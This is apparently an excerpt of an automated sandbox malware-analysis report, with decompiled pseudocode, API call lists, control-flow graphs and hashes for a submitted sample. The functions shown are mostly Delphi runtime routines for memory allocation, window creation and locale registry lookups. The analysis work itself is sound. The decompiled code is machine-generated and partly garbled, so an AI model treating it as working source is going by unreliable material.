                                  • 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00437192,00000000,00000000,?,00000000,?,00000000), ref: 00448BDB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: B380KeyboardLayout
                                  • String ID:
                                  • API String ID: 648844651-0
                                  • Opcode ID: 4833818333ae1f676f6f073883b2276584017d72018302c23ae20f7b6612e1f7
                                  • Instruction ID: 54356bd3370719273cc311dc10c274f3ec371e69c3afe03eb4c47db8766a1265
                                  • Opcode Fuzzy Hash: 4833818333ae1f676f6f073883b2276584017d72018302c23ae20f7b6612e1f7
                                  • Instruction Fuzzy Hash: E431C7706012419FE740EF29D8C5B997BE4AB05318F0481BEE908DF3A6DA7A9848DB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 365 4019fc-401a1e RtlInitializeCriticalSection 366 401a20-401a25 RtlEnterCriticalSection 365->366 367 401a2a-401a60 call 4013c0 * 3 LocalAlloc 365->367 366->367 374 401a91-401aa5 367->374 375 401a62 367->375 379 401ab1 374->379 380 401aa7-401aac RtlLeaveCriticalSection 374->380 376 401a67-401a79 375->376 376->376 378 401a7b-401a8a 376->378 378->374 380->379
                                  C-Code - Quality: 68%
                                  			E004019FC() {
                                  				void* _t11;
                                  				signed int _t13;
                                  				intOrPtr _t19;
                                  				void* _t20;
                                  				intOrPtr _t23;
                                  
                                  				_push(_t23);
                                  				_push(E00401AB2);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t23;
                                  				_push(0x44f5c8);
                                  				L00401350();
                                  				if( *0x44f049 != 0) {
                                  					_push(0x44f5c8);
                                  					L00401358();
                                  				}
                                  				E004013C0(0x44f5e8);
                                  				E004013C0(0x44f5f8);
                                  				E004013C0(0x44f624);
                                  				_t11 = LocalAlloc(0, 0xff8); // executed
                                  				 *0x44f620 = _t11;
                                  				if( *0x44f620 != 0) {
                                  					_t13 = 3;
                                  					do {
                                  						_t20 =  *0x44f620; // 0x70cac0
                                  						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                  						_t13 = _t13 + 1;
                                  					} while (_t13 != 0x401);
                                  					 *((intOrPtr*)(0x44f60c)) = 0x44f608;
                                  					 *0x44f608 = 0x44f608;
                                  					 *0x44f614 = 0x44f608;
                                  					 *0x44f5c0 = 1;
                                  				}
                                  				_pop(_t19);
                                  				 *[fs:eax] = _t19;
                                  				_push(E00401AB9);
                                  				if( *0x44f049 != 0) {
                                  					_push(0x44f5c8);
                                  					L00401360();
                                  					return 0;
                                  				}
                                  				return 0;
                                  			}









                                  APIs
                                  • RtlInitializeCriticalSection.KERNEL32(0044F5C8,00000000,00401AB2,?,?,00402296,0044F608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A12
                                  • RtlEnterCriticalSection.KERNEL32(0044F5C8,0044F5C8,00000000,00401AB2,?,?,00402296,0044F608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A25
                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0044F5C8,00000000,00401AB2,?,?,00402296,0044F608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A4F
                                  • RtlLeaveCriticalSection.KERNEL32(0044F5C8,00401AB9,00000000,00401AB2,?,?,00402296,0044F608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401AAC
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                  • String ID:
                                  • API String ID: 730355536-0
                                  • Opcode ID: 356a7c66a2d65856bea98b47bf8316d81f903ccf4c0801b3c83987a954302930
                                  • Instruction ID: 11ff6b854581f6326aade3b65510fb584eff821202e8baf66a9bb65ffce695b5
                                  • Opcode Fuzzy Hash: 356a7c66a2d65856bea98b47bf8316d81f903ccf4c0801b3c83987a954302930
                                  • Instruction Fuzzy Hash: 0B0180747452806EF319BFB99806B193AC0E78A709F56847BF801A6AF3D67C48498B1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 381 421c20-421c2e 382 421c50-421c5b 381->382 383 421c30-421c4e call 421b38 KiUserCallbackDispatcher 381->383 385 421c6f-421c71 382->385 386 421c5d 382->386 391 421c87-421c89 383->391 390 421c7c-421c7f 385->390 388 421c73-421c75 386->388 389 421c5f-421c60 386->389 388->390 392 421c62-421c66 389->392 393 421c77 389->393 390->391 394 421c81-421c82 GetSystemMetrics 390->394 392->390 395 421c68-421c6d 392->395 393->390 394->391 395->390
                                  C-Code - Quality: 58%
                                  			E00421C20(int _a4) {
                                  				void* __ebx;
                                  				void* __ebp;
                                  				signed int _t2;
                                  				signed int _t3;
                                  				void* _t7;
                                  				int _t8;
                                  				void* _t12;
                                  				void* _t13;
                                  				void* _t17;
                                  				void* _t18;
                                  
                                  				_t8 = _a4;
                                  				if( *0x44f920 == 0) {
                                  					 *0x44f8f8 = E00421B38(0, _t8,  *0x44f8f8, _t17, _t18);
                                  					_t7 =  *0x44f8f8(_t8); // executed
                                  					return _t7;
                                  				}
                                  				_t3 = _t2 | 0xffffffff;
                                  				_t12 = _t8 + 0xffffffb4 - 2;
                                  				__eflags = _t12;
                                  				if(__eflags < 0) {
                                  					_t3 = 0;
                                  				} else {
                                  					if(__eflags == 0) {
                                  						_t8 = 0;
                                  					} else {
                                  						_t13 = _t12 - 1;
                                  						__eflags = _t13;
                                  						if(_t13 == 0) {
                                  							_t8 = 1;
                                  						} else {
                                  							__eflags = _t13 - 0xffffffffffffffff;
                                  							if(_t13 - 0xffffffffffffffff < 0) {
                                  								_t3 = 1;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				__eflags = _t3 - 0xffffffff;
                                  				if(_t3 != 0xffffffff) {
                                  					return _t3;
                                  				} else {
                                  					return GetSystemMetrics(_t8);
                                  				}
                                  			}














                                  APIs
                                  • GetSystemMetrics.USER32 ref: 00421C82
                                    • Part of subcall function 00421B38: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00421BB8
                                  • KiUserCallbackDispatcher.NTDLL ref: 00421C48
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                  • String ID: GetSystemMetrics
                                  • API String ID: 54681038-96882338
                                  • Opcode ID: 9aa33d5a10da68003de371c1c4672fa77ddc1e8f7197474334caa3030beb35cf
                                  • Instruction ID: ed555d7674bd9a49a1034d6295892c5b71ffe7927f1f4dc75cfb49117a012f72
                                  • Opcode Fuzzy Hash: 9aa33d5a10da68003de371c1c4672fa77ddc1e8f7197474334caa3030beb35cf
                                  • Instruction Fuzzy Hash: 4BF0627C38431A5ADB105B3ABC8462235499777330FE14B33E122492F1D37C8846525D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 396 4020e8-4020fa 397 402105-40210b 396->397 398 4020fc call 4019fc 396->398 400 402117-40212c 397->400 401 40210d-402112 397->401 402 402101-402103 398->402 404 402138-402141 400->404 405 40212e-402133 RtlEnterCriticalSection 400->405 403 40226b-402274 401->403 402->397 402->401 406 402143 404->406 407 402148-40214e 404->407 405->404 406->407 408 402154-402158 407->408 409 4021e7-4021ed 407->409 412 40215a 408->412 413 40215d-40216c 408->413 410 402239-40223b call 401ff4 409->410 411 4021ef-4021fc 409->411 421 402240-402257 410->421 414 40220b-402237 call 4038f8 411->414 415 4021fe-402206 411->415 412->413 413->409 416 40216e-40217c 413->416 414->403 415->414 419 402198-40219c 416->419 420 40217e-402182 416->420 426 4021a1-4021bc 419->426 427 40219e 419->427 423 402184 420->423 424 402187-402196 420->424 429 402263 421->429 430 402259-40225e RtlLeaveCriticalSection 421->430 423->424 428 4021be-4021e2 call 4038f8 424->428 426->428 427->426 428->403 430->429
                                  APIs
                                    • Part of subcall function 004019FC: RtlInitializeCriticalSection.KERNEL32(0044F5C8,00000000,00401AB2,?,?,00402296,0044F608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A12
                                    • Part of subcall function 004019FC: RtlEnterCriticalSection.KERNEL32(0044F5C8,0044F5C8,00000000,00401AB2,?,?,00402296,0044F608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A25
                                    • Part of subcall function 004019FC: LocalAlloc.KERNEL32(00000000,00000FF8,0044F5C8,00000000,00401AB2,?,?,00402296,0044F608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A4F
                                    • Part of subcall function 004019FC: RtlLeaveCriticalSection.KERNEL32(0044F5C8,00401AB9,00000000,00401AB2,?,?,00402296,0044F608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401AAC
                                  • RtlEnterCriticalSection.KERNEL32(0044F5C8,00000000,00402264), ref: 00402133
                                  • RtlLeaveCriticalSection.KERNEL32(0044F5C8,0040226B), ref: 0040225E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                  • String ID:
                                  • API String ID: 2227675388-0
                                  • Opcode ID: 64634ed281bf2e3def8dd1485b447f57672411d220fd8f94c72ca7b3ffefdbf2
                                  • Instruction ID: d3f447eb9aa7a160312c851f6e3e80bceeeb0ad4ec12150bafd3bc75c341a2b5
                                  • Opcode Fuzzy Hash: 64634ed281bf2e3def8dd1485b447f57672411d220fd8f94c72ca7b3ffefdbf2
                                  • Instruction Fuzzy Hash: 4241F4B6A04700AFE714DF68ED8525977A0FB46318B1641BFD401E73E1E2789946CB0C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 433 448ee8-448f02 LoadCursorA 434 448f07-448f0a 433->434 435 448f11-448f14 434->435 436 448f0c-448f0f 434->436 437 448f16-448f1c 435->437 438 448f1e 435->438 436->435 436->437 439 448f20-448f3b LoadCursorA call 448fa0 437->439 438->439 439->434 442 448f3d-448f41 439->442
                                  C-Code - Quality: 100%
                                  			E00448EE8(void* __eax) {
                                  				struct HICON__* _t5;
                                  				void* _t7;
                                  				void* _t8;
                                  				struct HINSTANCE__* _t11;
                                  				CHAR** _t12;
                                  				void* _t13;
                                  
                                  				_t13 = __eax;
                                  				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
                                  				_t8 = 0xffffffea;
                                  				_t12 = 0x44dcb0;
                                  				do {
                                  					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
                                  						if(_t8 != 0xffffffeb) {
                                  							_t11 = 0;
                                  						} else {
                                  							goto L4;
                                  						}
                                  					} else {
                                  						L4:
                                  						_t11 =  *0x44f664; // 0x400000
                                  					}
                                  					_t5 = LoadCursorA(_t11,  *_t12); // executed
                                  					_t7 = E00448FA0(_t13, _t5, _t8);
                                  					_t8 = _t8 + 1;
                                  					_t12 =  &(_t12[1]);
                                  				} while (_t8 != 0xffffffff);
                                  				return _t7;
                                  			}










                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CursorLoad
                                  • String ID:
                                  • API String ID: 3238433803-0
                                  • Opcode ID: f2ee8a28f0a3720bb306ca519d2296695a0b1c42c8e1a86dce6c03d1a7a85cb4
                                  • Instruction ID: 41328e01a646b9c4514da70c0aa2717f3160c5ad4e06108785ee4182e3354fb3
                                  • Opcode Fuzzy Hash: f2ee8a28f0a3720bb306ca519d2296695a0b1c42c8e1a86dce6c03d1a7a85cb4
                                  • Instruction Fuzzy Hash: E0F08221B006041AA620663E5CC193E72469BD2735B61033FF93AD72D1CF2A5C49426D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 443 401514-401521 444 401523-401528 443->444 445 40152a-401530 443->445 446 401536-40154e VirtualAlloc 444->446 445->446 447 401550-40155e call 4013c8 446->447 448 401573-401576 446->448 447->448 451 401560-401571 VirtualFree 447->451 451->448
                                  C-Code - Quality: 100%
                                  			E00401514(void* __eax, void** __edx) {
                                  				void* _t3;
                                  				void** _t8;
                                  				void* _t11;
                                  				long _t14;
                                  
                                  				_t8 = __edx;
                                  				if(__eax >= 0x100000) {
                                  					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                  				} else {
                                  					_t14 = 0x100000;
                                  				}
                                  				_t8[1] = _t14;
                                  				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                  				_t11 = _t3;
                                  				 *_t8 = _t11;
                                  				if(_t11 != 0) {
                                  					_t3 = E004013C8(0x44f5e8, _t8);
                                  					if(_t3 == 0) {
                                  						VirtualFree( *_t8, 0, 0x8000);
                                  						 *_t8 = 0;
                                  						return 0;
                                  					}
                                  				}
                                  				return _t3;
                                  			}








                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,0040181D), ref: 00401543
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,0040181D), ref: 0040156A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 8a387463aaac9b488cfbd2126c7c83cbdc0fc5badabbe489550cf97dc277f00b
                                  • Instruction ID: 2b28731dcca4109f5a3d182e153a82ee7636d53d584dc31cef31d6d228a1dc9e
                                  • Opcode Fuzzy Hash: 8a387463aaac9b488cfbd2126c7c83cbdc0fc5badabbe489550cf97dc277f00b
                                  • Instruction Fuzzy Hash: 89F08272F0062027EB605AAA5C81B535A849B857A0F154076FE09FF3E9D6B58C0142AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 452 406728-40677a call 402908 CreateWindowExA call 4028f8
                                  C-Code - Quality: 100%
                                  			E00406728(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
                                  				long _v8;
                                  				void* _t12;
                                  				struct HWND__* _t22;
                                  				long _t27;
                                  				CHAR* _t30;
                                  
                                  				_v8 = _t27;
                                  				_t30 = __eax;
                                  				_t12 = E00402908();
                                  				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                  				E004028F8(_t12);
                                  				return _t22;
                                  			}









                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: d6517cc66965a63d9a19f71c26f30e1a56dd765cb672ad3b051190d3b03ed003
                                  • Instruction ID: 67dbcf29178014e7c3850b007cc5250012106697f65b98949b18a9a62ad3702d
                                  • Opcode Fuzzy Hash: d6517cc66965a63d9a19f71c26f30e1a56dd765cb672ad3b051190d3b03ed003
                                  • Instruction Fuzzy Hash: 09F0E7B2700108BFC780DE9DDC85E9B77ECEB4D264B004129FA0CE3241D174EC108760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 457 4372cc-4372e4 458 4372e6-4372fb GetVersion call 437098 457->458 459 437344-437351 457->459 461 437300-43733f call 412d60 call 412e00 call 412dac * 3 458->461 461->459
                                  C-Code - Quality: 77%
                                  			E004372CC(void* __ecx, void* __edi, void* __esi) {
                                  				intOrPtr _t6;
                                  				intOrPtr _t8;
                                  				intOrPtr _t10;
                                  				intOrPtr _t12;
                                  				intOrPtr _t14;
                                  				void* _t16;
                                  				void* _t17;
                                  				intOrPtr _t20;
                                  				intOrPtr _t21;
                                  				intOrPtr _t22;
                                  				intOrPtr _t23;
                                  				intOrPtr _t28;
                                  
                                  				_t25 = __esi;
                                  				_t17 = __ecx;
                                  				_push(_t28);
                                  				_push(0x437352);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t28;
                                  				 *0x44fb18 =  *0x44fb18 - 1;
                                  				if( *0x44fb18 < 0) {
                                  					 *0x44fb14 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
                                  					_t31 =  *0x44fb14;
                                  					E00437098(_t16, __edi,  *0x44fb14);
                                  					_t6 =  *0x427ebc; // 0x427f08
                                  					E00412D60(_t6, _t16, _t17,  *0x44fb14);
                                  					_t8 =  *0x427ebc; // 0x427f08
                                  					E00412E00(_t8, _t16, _t17, _t31);
                                  					_t21 =  *0x427ebc; // 0x427f08
                                  					_t10 =  *0x43866c; // 0x4386b8
                                  					E00412DAC(_t10, _t16, _t21, __esi, _t31);
                                  					_t22 =  *0x427ebc; // 0x427f08
                                  					_t12 =  *0x43735c; // 0x4373a8
                                  					E00412DAC(_t12, _t16, _t22, __esi, _t31);
                                  					_t23 =  *0x427ebc; // 0x427f08
                                  					_t14 =  *0x437480; // 0x4374cc
                                  					E00412DAC(_t14, _t16, _t23, _t25, _t31);
                                  				}
                                  				_pop(_t20);
                                  				 *[fs:eax] = _t20;
                                  				_push(0x437359);
                                  				return 0;
                                  			}
















                                  APIs
                                  • GetVersion.KERNEL32(00000000,00437352), ref: 004372E6
                                    • Part of subcall function 00437098: GetCurrentProcessId.KERNEL32(?,00000000,00437210), ref: 004370B9
                                    • Part of subcall function 00437098: GlobalAddAtomA.KERNEL32 ref: 004370EC
                                    • Part of subcall function 00437098: GetCurrentThreadId.KERNEL32 ref: 00437107
                                    • Part of subcall function 00437098: GlobalAddAtomA.KERNEL32 ref: 0043713D
                                    • Part of subcall function 00437098: RegisterClipboardFormatA.USER32 ref: 00437153
                                    • Part of subcall function 00437098: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00437210), ref: 004371D7
                                    • Part of subcall function 00437098: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 004371E8
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                  • String ID:
                                  • API String ID: 3775504709-0
                                  • Opcode ID: 00ec1fbcea8a8c286b490e80c62bb5ce75e471034f08af960100f33daf45af21
                                  • Instruction ID: 707a3c92acec95c974c860f69107c428bf46c43c41c19028877ccff92c651e72
                                  • Opcode Fuzzy Hash: 00ec1fbcea8a8c286b490e80c62bb5ce75e471034f08af960100f33daf45af21
                                  • Instruction Fuzzy Hash: 5AF04FB530C2409FC320AB25FD52A157BA4F78A3147A1A07BEC4087671C5B8AC52DB6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00404E34(void* __eax) {
                                  				char _v272;
                                  				intOrPtr _t14;
                                  				void* _t16;
                                  				intOrPtr _t18;
                                  				intOrPtr _t19;
                                  
                                  				_t16 = __eax;
                                  				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                  					_t3 = _t16 + 4; // 0x400000
                                  					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                                  					_t14 = E00405070(_t19); // executed
                                  					_t18 = _t14;
                                  					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                  					if(_t18 == 0) {
                                  						_t5 = _t16 + 4; // 0x400000
                                  						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                                  					}
                                  				}
                                  				_t7 = _t16 + 0x10; // 0x400000
                                  				return  *_t7;
                                  			}









                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,00410240,00404E9C,00405940,0000FF9D,?,00000400,?,00410240,004134D3,00000000,004134F8), ref: 00404E52
                                    • Part of subcall function 00405070: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0044D0A4,?,00404E60,00400000,?,00000105,00000001,00410240,00404E9C,00405940,0000FF9D,?), ref: 0040508C
                                    • Part of subcall function 00405070: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0044D0A4,?,00404E60,00400000,?,00000105,00000001), ref: 004050AA
                                    • Part of subcall function 00405070: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0044D0A4), ref: 004050C8
                                    • Part of subcall function 00405070: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 004050E6
                                    • Part of subcall function 00405070: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405175,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040512F
                                    • Part of subcall function 00405070: RegQueryValueExA.ADVAPI32(?,004052DC,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405175,?,80000001), ref: 0040514D
                                    • Part of subcall function 00405070: RegCloseKey.ADVAPI32(?,0040517C,00000000,00000000,00000005,00000000,00405175,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0040516F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Open$FileModuleNameQueryValue$Close
                                  • String ID:
                                  • API String ID: 2796650324-0
                                  • Opcode ID: 3855c074a3c99940ec4b8fe29ccf32c05425aa7ee1b52fe41a6d2995bdb4701f
                                  • Instruction ID: 5d39e02b33a5e1a50daa166209b6e4678cdb7a90b1483256e0dd93e64e7ea764
                                  • Opcode Fuzzy Hash: 3855c074a3c99940ec4b8fe29ccf32c05425aa7ee1b52fe41a6d2995bdb4701f
                                  • Instruction Fuzzy Hash: ADE06DB1A003148BCB50DE68C8C1A4733D8AB88794F0005A6ED58EF38AD375DD208BD4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004016A8(signed int __eax, void** __ecx, intOrPtr __edx) {
                                  				signed int _v20;
                                  				void** _v24;
                                  				void* _t15;
                                  				void** _t16;
                                  				void* _t17;
                                  				signed int _t27;
                                  				intOrPtr* _t29;
                                  				void* _t31;
                                  				intOrPtr* _t32;
                                  
                                  				_v24 = __ecx;
                                  				 *_t32 = __edx;
                                  				_t31 = __eax & 0xfffff000;
                                  				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                  				 *_v24 = _t31;
                                  				_t15 = _v20 - _t31;
                                  				_v24[1] = _t15;
                                  				_t29 =  *0x44f5e8; // 0x70aa0c
                                  				while(_t29 != 0x44f5e8) {
                                  					_t17 =  *(_t29 + 8);
                                  					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
                                  					if(_t31 > _t17) {
                                  						_t17 = _t31;
                                  					}
                                  					if(_t27 > _v20) {
                                  						_t27 = _v20;
                                  					}
                                  					if(_t27 > _t17) {
                                  						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                  						if(_t15 == 0) {
                                  							_t16 = _v24;
                                  							 *_t16 = 0;
                                  							return _t16;
                                  						}
                                  					}
                                  					_t29 =  *_t29;
                                  				}
                                  				return _t15;
                                  			}













                                  APIs
                                  • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401715
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
